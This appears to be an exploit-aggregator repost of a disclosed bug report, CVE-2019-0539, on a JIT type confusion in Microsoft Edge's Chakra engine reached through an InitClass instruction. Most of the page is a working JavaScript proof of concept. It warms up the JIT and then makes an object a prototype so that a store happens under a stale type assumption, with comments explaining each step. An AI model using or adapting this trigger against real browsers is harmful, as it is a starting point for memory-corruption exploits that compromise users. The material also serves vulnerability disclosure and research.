Microsoft Edge Chakra JIT InitClass Type Confusion

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010188

Below is a copy:

Microsoft Edge: Chakra: JIT: Type confusion via InitClass 

CVE-2019-0539


This is similar to issue 1702 (Microsoft Edge: Chakra: JIT: Type confusion via NewScObjectNoCtor or InitProto). This time, it uses an InitClass instruction to reach the SetIsPrototype method.

// Proof of concept as posted in the report; run in a Chakra shell that provides print().
function opt(o, c, value) {
    o.b = 1;

    // InitClass: with c.prototype set to o, this reaches SetIsPrototype on o,
    // changing o's type while the JIT-compiled code still assumes the old one.
    class A extends c {

    }

    // Store performed under the stale type assumption (the type confusion).
    o.a = value;
}

function main() {
    // Warm up opt() so the JIT compiles it for objects shaped like {a, b}.
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }

    let o = {a: 1, b: 2};
    let cons = function () {};

    // Make o the prototype of the parent class so InitClass marks it as a prototype.
    cons.prototype = o;

    opt(o, cons, 0x1234);

    print(o.a);
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.
